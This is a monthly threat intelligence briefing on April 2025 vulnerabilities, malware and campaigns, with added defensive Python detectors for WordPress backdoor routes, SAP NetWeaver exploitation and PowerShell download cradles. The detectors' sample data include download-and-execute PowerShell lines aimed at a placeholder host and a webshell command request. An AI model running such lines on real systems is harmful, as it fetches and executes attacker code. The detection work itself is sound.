Monthly Threat Briefing

Cyware Monthly Threat Intelligence, April 2025


The Good

Cyber defenders are flexing their innovation muscles this season. ETSI unveiled ETSI TS 104 223, the world’s first comprehensive technical specification for AI security, outlining 13 core and 72 trackable principles across the AI lifecycle and addressing threats such as data poisoning and model obfuscation. MITRE released ATT&CK v17, expanding its threat intelligence framework with ESXi platform coverage, new analytics, mobile attack techniques, and enriched mitigation strategies. Meanwhile, CISA extended funding to MITRE to sustain the Common Vulnerabilities and Exposures (CVE) program until 2026, safeguarding vulnerability coordination. In the U.K., the government rolled out a Cyber Governance Code of Practice to help organizational leaders strengthen cyber resilience, complemented by a modular training package.

  • ETSI has released new technical specifications, ETSI TS 104 223, to establish a global benchmark for securing AI models and systems. The specifications include 13 core principles and 72 trackable principles across five lifecycle phases: secure design, development, deployment, maintenance, and end of life. These standards address unique AI challenges such as data poisoning and model obfuscation. ETSI's initiative is seen as a global first in setting a baseline for AI security, developed with input from international bodies, including significant contributions from the UK's Department for Science, Innovation and Technology and the National Cyber Security Centre.

  • MITRE introduced ATT&CK v17, enhancing its cybersecurity framework to address evolving threats. Key updates include the addition of the ESXi platform to the Enterprise matrix, reflecting increased attacks on virtualization infrastructure. Defensive improvements feature over 140 new analytics, optimized data collection with platform-specific guidance, and enriched mitigation strategies. Mobile updates encompass new techniques and tools, such as SIM Card Swap and virtualization-based malware. The CTI section now tracks additional groups and campaigns, highlighting state-sponsored and criminal operations. 

  • The DOJ launched the Data Security Program to prevent foreign adversaries, particularly designated "countries of concern" like China and Russia, from commercially purchasing sensitive U.S. data. The program prohibits unauthorized transactions, such as data brokerage, involving bulk personal (genomic, biometric, health, financial) and government-related data transfers to these nations. This initiative aims to counter espionage, surveillance, and data misuse by adversaries. 

  • To shorten the window in which a compromised or mis-issued certificate remains usable, the CA/Browser Forum has voted to drastically shorten SSL/TLS certificate lifespans. Certificates are currently valid for up to 398 days; the maximum validity will drop incrementally to 200 days by March 2026, 100 days by 2027, and finally 47 days by March 2029. This reduces the time attackers can exploit compromised certificates and pushes organizations toward certificate management automation and crypto-agility, which also aids quantum-readiness.

  • CISA has extended funding to MITRE to ensure continuity of the Common Vulnerabilities and Exposures (CVE) program, avoiding a potential lapse in critical services. CISA announced the 11-month extension on April 16, exercising an existing option period in the $57.8 million contract and ensuring the program's continuity until at least March 16, 2026.

  • Prodaft has launched a unique initiative called SYS, offering to purchase user accounts on five prominent cybercrime-focused dark web forums: XSS, Exploit[.]in, RAMP4U, Verified, and BreachForums. The program encourages users looking to leave cybercrime to sell their accounts. While Prodaft guarantees seller anonymity, it states that the purchased accounts will be reported to its law enforcement partners for transparency.

  • The U.K. government launched a new Cyber Governance Code of Practice to enhance cyber resilience in medium and large organizations. The code, developed by experts from the NCSC, the Department for Science, Innovation and Technology, and other professional bodies, provides guidance for board members and directors on managing cyber risk effectively. It comes with a set of actions, a training package, and a toolkit for boards. The training package is divided into five modules matching the pillars of the code: risk management; strategy; people; incident planning, response and recovery; and assurance and oversight.

  • The British Business Bank committed nearly £37.5 million of a £50 million ($64 million) fund to support early-stage cybersecurity startups in the U.K. Osney Capital's Fund 1 plans to invest between £250,000 and £2.5 million in 30 portfolio companies at pre-seed and seed stage, with plans for follow-on Series A rounds. The British Business Bank's contribution to the Osney Capital fund reflects the growing strategic importance of cybersecurity to the government. 

The Bad

Cybercriminals have been busy, and unfortunately, so have their exploits. Critical zero-click vulnerabilities in Apple’s AirPlay protocol, dubbed AirBorne (CVE-2025-24252, CVE-2025-24132), could allow remote code execution on billions of devices, while a flaw in Avast Free Antivirus (CVE-2025-3500) enables local privilege escalation to kernel level. Meanwhile, a campaign linked to SocGholish malware and RansomHub ransomware affiliates begins with fake Microsoft Edge updates and deploys a Python backdoor for remote access and lateral movement. Another campaign by Slow Pisces targets cryptocurrency developers with macOS malware disguised as job challenges, delivered via LinkedIn. In the supply chain domain, a malicious Python package named disgrasya on PyPI was found automating carding attacks against WooCommerce stores and was downloaded over 34,000 times before detection.

  • Oligo Security identified critical vulnerabilities in Apple's AirPlay Protocol, termed "AirBorne," enabling zero-click RCE and other attacks. Key vulnerabilities include CVE-2025-24252 (use-after-free) and CVE-2025-24132 (buffer overflow), allowing attackers to exploit devices without user interaction. These vulnerabilities affect billions of devices, including Macs and third-party products using the AirPlay SDK. Apple has released patches, and users are urged to update their devices and adjust AirPlay settings to mitigate risks. 

  • A critical vulnerability in Avast Free Antivirus, identified as CVE-2025-3500, allows attackers to escalate privileges and execute code with kernel-level access. This flaw, caused by improper data validation in the aswbidsdriver kernel driver, has a CVSS score of 8.8. Although local access is required to exploit it, the vulnerability poses a significant risk due to the potential for complete system control. Avast has released a patch in version 25.3.9983.922, urging users to update immediately. The issue affects versions from 20.1.2397 to 2016.11.1.2262. 

  • Wordfence spotted WP-antymalwary-bot.php, a malware disguised as a WordPress plugin. The malware uses a backdoor function for admin login and registers a REST API route without permission checks. It enables unauthorized access, remote code execution, and script injection. The malware hides from the dashboard and can reinfect sites via a modified `wp-cron.php` file. It communicates with a C2 server, sending site URLs for tracking. It injects malicious JavaScript ads using obfuscated methods and evolves rapidly with enhanced mechanisms.
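
The "REST API route without permission checks" is the part of this malware a site owner can hunt for in any plugin, not just this one. The following is an added example, not code from Wordfence or from the malware it analyzed: a small static scanner that finds `register_rest_route()` calls whose `permission_callback` is absent or is `__return_true`, the two configurations that leave an endpoint callable by unauthenticated clients. The PHP it scans is constructed for illustration and is not the real WP-antymalwary-bot.php.

```python
"""Static check for WordPress REST routes registered without a permission check.

Added example, not code from Wordfence or from the malware it analyzed. It scans
PHP source for register_rest_route() calls and flags those whose
'permission_callback' is missing or is '__return_true', which is what leaves an
endpoint reachable by unauthenticated callers.
"""
import re

# Constructed PHP for illustration; this is not the real WP-antymalwary-bot.php.
SAMPLE_PLUGIN_SOURCE = r"""<?php
add_action('rest_api_init', function () {
    // exposed: no permission_callback at all
    register_rest_route('hidden/v1', '/run', array(
        'methods'  => 'POST',
        'callback' => 'hidden_exec',
    ));
    // exposed: permission_callback that always allows
    register_rest_route('hidden/v1', '/inject', [
        'methods'             => 'POST',
        'callback'            => 'hidden_inject',
        'permission_callback' => '__return_true',
    ]);
    // protected: capability check on the calling user
    register_rest_route('site/v1', '/status', [
        'methods'             => 'GET',
        'callback'            => 'site_status',
        'permission_callback' => function () { return current_user_can('manage_options'); },
    ]);
});
"""

ROUTE_CALL = re.compile(r"\bregister_rest_route\s*\(", re.IGNORECASE)
PERM_KEY = re.compile(r"['\"]permission_callback['\"]\s*=>\s*(.+?)\s*[,\]\)]", re.DOTALL)
STRING_LITERAL = re.compile(r"'([^']*)'|\"([^\"]*)\"")


def _call_text(src: str, start: int) -> str:
    """Return src from `start` through the ')' that closes the call.

    Parentheses inside string literals are not special-cased; good enough for
    the argument arrays register_rest_route() normally receives.
    """
    depth = 0
    for i in range(start, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[start:i + 1]
    return src[start:]


def find_unprotected_routes(php_source: str) -> list:
    """Return [{'namespace', 'route', 'reason'}] for every exposed route."""
    findings = []
    for m in ROUTE_CALL.finditer(php_source):
        call = _call_text(php_source, m.start())
        # The first two string literals are the namespace and the route pattern.
        literals = [a or b for a, b in STRING_LITERAL.findall(call)]
        namespace, route = (literals + ["?", "?"])[:2]
        perm = PERM_KEY.search(call)
        if perm is None:
            reason = "missing permission_callback"
        elif "__return_true" in perm.group(1):
            reason = "permission_callback is __return_true"
        else:
            continue
        findings.append({"namespace": namespace, "route": route, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_unprotected_routes(SAMPLE_PLUGIN_SOURCE):
        print(f"{f['namespace']}{f['route']}: {f['reason']}")
```

Run it over `wp-content/plugins` and `wp-content/mu-plugins`; a hit on a write-capable route (POST, command execution, file writes) in a plugin you do not recognize is the kind of backdoor described above. A `__return_true` callback is legitimate only for routes that are meant to be public and read-only.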

  • Hannibal Stealer is a rebranded variant of the Sharp and TX stealers that targets sensitive data from Chromium- and Gecko-based browsers, cryptocurrency wallets, and FTP clients. It employs geofencing to evade detection and also harvests VPN credentials, Steam sessions, and Discord tokens. Advertised on dark web forums with a subscription model, it features a Django-based control panel for managing stolen data. Its source code shows minimal innovation over its predecessors, with changes mainly in the log delivery mechanisms.

  • A sophisticated cyberattack campaign has been identified by eSentire, linking SocGholish malware to RansomHub ransomware affiliates. The attack starts when victims download a fake Microsoft Edge update from a compromised WordPress site, leading to the deployment of a Python backdoor. This malware collects system information to identify high-value targets and employs multiple encryption layers for concealment. It enables remote command execution and lateral movement within networks.

  • The Kimsuky group is distributing PebbleDash malware, previously associated with the Lazarus group, via spear-phishing. Initial access relies on LNK files that execute JavaScript, which in turn runs PowerShell to establish persistence and install the malware. The attackers use AsyncRAT alongside PebbleDash for remote control, and a modified termsrv.dll disables RDP authentication to allow unauthorized remote access. Users are advised to verify file extensions, check for modified DLLs by comparing hashes against known-good copies, and monitor for suspicious accounts such as ‘Root’.

  • In a recent campaign, the Chinese APT Mustang Panda deployed an updated ToneShell backdoor with enhanced payload execution capabilities, using a modified FakeTLS protocol for C&C communication to evade detection. Newly observed tools include StarProxy, designed for lateral movement by proxying traffic over FakeTLS; two keyloggers, Paklog (logs keystrokes and clipboard contents locally) and Corklog (encrypts captured data and sets persistence); and the SplatCloak driver. Delivered via SplatDropper, SplatCloak specifically identifies and disables Windows Defender and Kaspersky defenses.

  • The North Korean hacking group Slow Pisces has been linked to a malicious campaign targeting cryptocurrency developers. The group engages with developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges. The malware consists of two components, RN Loader and RN Stealer. The multi-stage attack chain delivers the malicious payload only to validated targets, likely selected based on IP address, geolocation, time, and HTTP request headers; RN Stealer then harvests sensitive information from infected Apple macOS systems.

  • Cofense analyzed a sophisticated phishing campaign titled "Pick Your Poison." The attack begins with an email that appears to be from a legitimate file-sharing service, files[.]fm, warning the recipient of an impending file deletion. Upon clicking the embedded link, users are redirected to a legitimate files[.]fm page, enhancing the illusion of safety. However, when users open the shared file, they are presented with two options, "Preview" or "Download," both leading to malicious outcomes. The malware often installs a RAT such as ConnectWise RAT, allowing threat actors unauthorized access to compromised systems. 

  • Cybercriminals are targeting Intuit QuickBooks users by purchasing prominent Google Ads that lead to fake login pages, aiming to steal sensitive information like usernames, passwords, and one-time passcodes. The phishing pages closely resemble the genuine QuickBooks site, making it difficult for users to distinguish between the two. Users are advised to access their QuickBooks account directly through the official Intuit website or application, and to be vigilant about verifying the URL. 

  • The NCSC and international cybersecurity agencies have discovered that hackers are using two types of spyware, MOONSHINE and BADBAZAAR, to spy on Uyghur, Tibetan, and Taiwanese individuals and civil society organizations. The spyware-infected apps target individuals and groups perceived as a threat to China's stability, including those associated with Taiwan's independence, Tibetan rights, Uyghur Muslims, ethnic minorities in Xinjiang, democracy advocates, and Falun Gong members. Some apps mimic popular platforms like WhatsApp and Skype, while others are standalone apps designed to attract potential victims. The Tibet One and Audio Quran apps, which have been used to spread the spyware, have been removed from app stores. 

  • Socket spotted a malicious Python package named "disgrasya" on PyPI. This package contains an automated carding script targeting WooCommerce stores using CyberSource as their payment gateway. Unlike typical supply chain attacks, disgrasya made no attempt to appear legitimate. The script simulates real transactions to test stolen credit card numbers, making it hard to detect. It has been downloaded over 34,000 times. 

New Threats

Several emerging cyber threats have recently come to light, highlighting growing risks across global sectors. Earth Kasha, linked to China’s APT10, launched a spear-phishing campaign in Taiwan and Japan using a malicious Excel file, ROAMINGMOUSE, to deploy the ANEL and NOOPDOOR backdoors for espionage. Unit 42 exposed Gremlin Stealer, a C#-based malware that harvests sensitive data like credentials and crypto wallets, while Proofpoint flagged TA2900, a French-speaking BEC actor targeting rental payments using socially engineered emails and possibly generative AI. Sysdig identified UNC5174, a Chinese group, using SNOWLIGHT malware and VShell RAT in fileless Linux attacks. Meanwhile, ToddyCat exploited a flaw in ESET software to deliver TCESB malware using DLL hijacking and BYOVD techniques. 

  • Earth Kasha, an APT group believed to be part of APT10, has launched a new spear-phishing campaign targeting Taiwan and Japan in March. The campaign aims to deliver a new version of the ANEL backdoor for espionage, potentially leading to information theft and compromising sensitive data. The campaign uses a malicious Excel file, ROAMINGMOUSE, to drop ANEL components, and employs SharpHide for persistence. The second-stage backdoor, NOOPDOOR, utilizes DNS over HTTPS for secure IP resolution.

  • Unit 42 has identified Gremlin Stealer, a new info-stealer written in C# and advertised on Telegram since March. It targets sensitive data, including browser cookies, credit card information, cryptocurrency wallets, and credentials from FTP and VPN services. The malware bypasses Chrome's cookie protection and uploads stolen data to a server at 207.244.199[.]46. Gremlin Stealer is actively developed and capable of exfiltrating data from various applications, including Telegram and Discord.

  • Proofpoint has identified a new BEC threat actor, TA2900, targeting rental payments in France and occasionally Canada. This actor sends fraudulent French language emails claiming unpaid rent and instructs recipients to send payments to new bank accounts, often changing IBAN details frequently. The campaigns use compromised educational institution mailboxes and social engineering tactics to elicit emotional responses from victims. Researchers suspect the use of generative AI in crafting the emails, although this is unconfirmed. The threat actor's objective is financial theft, using opportunistically compromised accounts globally. 

  • A newly disclosed vulnerability in the Linux kernel, CVE-2025-21756, nicknamed "Attack of the Vsock," allows privilege escalation to root. The flaw lies in the kernel's vsock (VM sockets) implementation, where errors in reference counting during vsock transport reassignment lead to a use-after-free, enabling attackers to execute arbitrary code with kernel privileges. A published proof-of-concept exploit shows how the vulnerability can be triggered, the freed memory reclaimed, kernel addresses leaked, and control flow hijacked to gain root access.

  • A critical zero-day vulnerability, CVE-2025-31324, in the SAP NetWeaver Visual Composer MetadataUploader has been actively exploited to deploy webshells and C2 frameworks, compromising enterprise and government systems. The vulnerability allows unauthenticated attackers to upload and execute malicious binaries via the /developmentserver/metadatauploader endpoint, gaining full control over affected systems. Many of the breached systems were running the latest service packs, as the flaw bypassed existing protections. Post-exploitation, attackers used the Brute Ratel C2 framework and the Heaven's Gate technique to maintain persistence and evade detection.
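
Because the endpoint path is known, the exploitation described above leaves a recognisable trail in the web tier's access logs. The following is an added example, not code from SAP or from any incident report: it parses common-log-format lines and alerts on POST requests to the metadata uploader endpoint, on later requests for .jsp resources from a client that made such a POST (how a dropped webshell would be reached), and, at lower severity, on GET probes of the endpoint. The log lines are constructed for this example and use documentation IP ranges; the normalisation step matters because case changes and `;jsessionid=` path parameters defeat naive exact-match rules.

```python
"""Flag CVE-2025-31324-style activity in web-server access logs.

Added example, not from SAP or any incident report. It parses common-log-format
lines and raises an alert on (1) POST requests to the Visual Composer
metadata uploader endpoint, (2) later requests for .jsp resources from a
client that made such a POST, and (3) GET probes of the endpoint. The log
lines are constructed; the IPs are documentation ranges.
"""
import re

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
UPLOADER = "/developmentserver/metadatauploader"

SAMPLE_LOG = """\
203.0.113.7 - - [29/Apr/2025:10:01:02 +0000] "GET /irj/portal HTTP/1.1" 200 5120
203.0.113.7 - - [29/Apr/2025:10:01:09 +0000] "POST /developmentserver/MetadataUploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 341
203.0.113.7 - - [29/Apr/2025:10:01:15 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 88
198.51.100.4 - - [29/Apr/2025:10:05:40 +0000] "GET /irj/portal HTTP/1.1" 200 5120
198.51.100.4 - - [29/Apr/2025:10:05:41 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 2200
192.0.2.9 - - [29/Apr/2025:10:07:00 +0000] "GET /irj/servlet/prt/portal/prtroot/com.sap.portal.navigation.portallauncher.default HTTP/1.1" 200 9000
"""


def normalize_path(raw: str) -> str:
    """Strip query string, path parameters and trailing slash; lower-case.

    Attackers vary case and append ';jsessionid=' style parameters to dodge
    exact-match rules, so compare on the normalized form.
    """
    path = raw.split("?", 1)[0].split(";", 1)[0]
    return path.rstrip("/").lower() or "/"


def parse_line(line: str):
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_suspicious(log_text: str) -> list:
    """Return alerts in log order; each has ip, ts, rule, severity, path."""
    alerts = []
    posted = set()  # clients that have POSTed to the uploader so far
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = normalize_path(rec["path"])
        hit = None
        if path == UPLOADER:
            if rec["method"] == "POST":
                posted.add(rec["ip"])
                hit = ("metadatauploader-post", "high")
            else:
                hit = ("metadatauploader-probe", "low")
        elif path.endswith(".jsp") and rec["ip"] in posted:
            hit = ("jsp-after-upload", "high")
        if hit:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "rule": hit[0],
                           "severity": hit[1], "path": rec["path"]})
    return alerts


if __name__ == "__main__":
    for a in find_suspicious(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['ts']} {a['ip']} {a['rule']} {a['path']}")
```

The .jsp rule is deliberately conditioned on a preceding POST from the same client, since NetWeaver portals serve legitimate JSP content all day; unconditional alerting on .jsp requests would bury the real hits. Where the uploader endpoint has no business being reachable at all, the probe rule can be raised to high as well.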

  • A new Android spyware, Android.Spy.1292.origin, has been discovered in a fake Alpine Quest app, targeting Russian military personnel. The spyware, hidden in a trojanized version of the app, steals contacts, geolocation, and file information and can download additional modules to exfiltrate stored data. Distributed via Russian Android catalogs and a fake Telegram channel, the spyware sends data to a command-and-control server and shares geolocation updates with attackers' Telegram bots. The modular design allows it to perform a broader range of malicious activities. 

  • Sysdig uncovered a new campaign by Chinese state-linked group UNC5174, active since late 2024. The group used a malicious bash script to deliver the SNOWLIGHT malware and fileless VShell RAT via domain-squatting-based infrastructure. UNC5174 targeted Linux systems, using WebSockets for stealthy C2. Their techniques, victims, and infrastructure pointed to espionage and access brokering, with operations traced back to November 2024.

  • Check Point Research uncovered a phishing campaign by Russian APT29, targeting European diplomatic entities using fake wine-tasting event invites. The attackers impersonated a European foreign ministry and used a new loader, GRAPELOADER, to deploy a variant of their WINELOADER backdoor. GRAPELOADER handled fingerprinting, persistence, and payload delivery, while the updated WINELOADER acted as a modular backdoor. Both shared stealth techniques and obfuscation methods. 

  • A Chinese-linked threat group, ToddyCat, has been exploiting a security vulnerability in ESET's software to deliver a new malware, TCESB, in Asia. The malware uses DLL Search Order Hijacking to gain control of the execution flow, exploiting a flaw in ESET Command Line Scanner, which insecurely loads a DLL named "version.dll." TCESB is a modified version of an open-source tool, EDRSandBlast, and uses the BYOVD technique to install a vulnerable Dell driver, DBUtilDrv2.sys, susceptible to a privilege escalation flaw tracked as CVE-2021-36276. 

  • The latest version of Neptune RAT has been discovered, using advanced anti-analysis techniques and persistence methods to maintain its presence on the victim’s system. It comes packed with malicious features, including a crypto clipper, a password stealer that exfiltrates credentials from 270+ unique apps, ransomware capabilities, and live desktop monitoring. Neptune RAT uses the PowerShell aliases irm (Invoke-RestMethod) and iex (Invoke-Expression) to download and execute a batch script and the malware payload, establishing a connection between the client and the attacker’s server. The malware has been proliferating via GitHub, Telegram, and YouTube and targets Windows users.
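
The irm-piped-to-iex cradle is visible in process-creation telemetry, but only if the detection survives the two evasions that usually accompany it: backtick-split tokens (i`ex) and the whole script hidden behind -EncodedCommand. The following is an added example, not code from the Neptune RAT analysis, that checks a command line in both its visible and its decoded form. The command lines it runs on are constructed to resemble Sysmon-style CommandLine fields and use a documentation IP range.

```python
"""Detect PowerShell download-and-execute cradles in process command lines.

Added example, not from the Neptune RAT analysis. It matches the irm/iwr
(Invoke-RestMethod / Invoke-WebRequest) piped-to-iex (Invoke-Expression)
pattern, after undoing two common evasions: backtick-split tokens such as
i`ex and -EncodedCommand payloads (base64 of UTF-16LE). The command lines
below are constructed to resemble process-creation telemetry.
"""
import base64
import re
from typing import Optional

FETCH = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)"
EXEC = r"(?:iex|invoke-expression)"
# "fetch ... | iex"  or  "iex (fetch ...)", in alias or full-cmdlet form
CRADLE = re.compile(
    rf"\b{FETCH}\b.*\|\s*{EXEC}\b|\b{EXEC}\b\s*\(?.*\b{FETCH}\b",
    re.IGNORECASE,
)
# -e / -ec / -enc / -encodedcommand followed by the base64 payload
ENCODED = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _deobfuscate(text: str) -> str:
    # Backticks and quote characters split tokens without changing what runs.
    return text.replace("`", "").replace('"', "").replace("'", "")


def is_download_cradle(cmdline: str) -> bool:
    """True if the visible or the decoded command line contains a cradle."""
    candidates = [cmdline]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        candidates.append(decoded)
    return any(CRADLE.search(_deobfuscate(c)) for c in candidates)


def _encoded(script: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed samples; 198.51.100.0/24 is a documentation range.
SAMPLE_CMDLINES = [
    'powershell.exe -nop -w hidden -c "irm http://198.51.100.20/run.bat | iex"',
    'powershell -c "i`ex (iwr http://198.51.100.20/p.ps1 -UseBasicParsing).Content"',
    "powershell.exe -enc " + _encoded("irm http://198.51.100.20/x | iex"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    'powershell -c "Invoke-WebRequest https://example.com/f.zip -OutFile C:\\tmp\\f.zip"',
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print("ALERT " if is_download_cradle(c) else "ok    ", c[:80])
```

The last two samples are the false-positive guard: a script launched from disk and a plain Invoke-WebRequest that writes a file are normal administration, and neither pipes fetched content into Invoke-Expression. In a SIEM, the same logic belongs on the CommandLine field of process-creation events, with the decoded script kept alongside the alert so an analyst can read what actually ran.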

  • A new, sophisticated phishing campaign misuses Cloudflare services and Telegram for malicious purposes. The attacks use Cloudflare-branded phishing pages and advanced tactics to evade detection. The phishing pages, hosted on Cloudflare’s Pages[.]dev and Workers[.]dev platforms, impersonate DMCA takedown notices and trick victims into downloading malicious files disguised as PDFs. The attackers exploit the "search-ms" protocol to initiate a malware infection chain. The malware establishes persistence and communicates with Pyramid C2 servers. A significant evolution in this campaign is the integration of Telegram for victim tracking. 

  • The Gootloader malware has re-emerged with a new campaign that combines traditional social engineering tactics with modern ad-based delivery methods. The operators are now using Google Ads to target individuals searching for legal document templates. The attack chain begins with a Google search, where a sponsored ad from a seemingly legitimate legal document provider, lawliner[.]com, appears among the top results. Upon clicking, users are prompted to enter their email address to access the document. They then receive an email containing a link to download a ZIP archive with a JavaScript file. When executed, this file performs classic Gootloader behavior, creating a scheduled task, dropping another .js file, and launching PowerShell scripts that attempt to reach out to a series of compromised WordPress blogs.
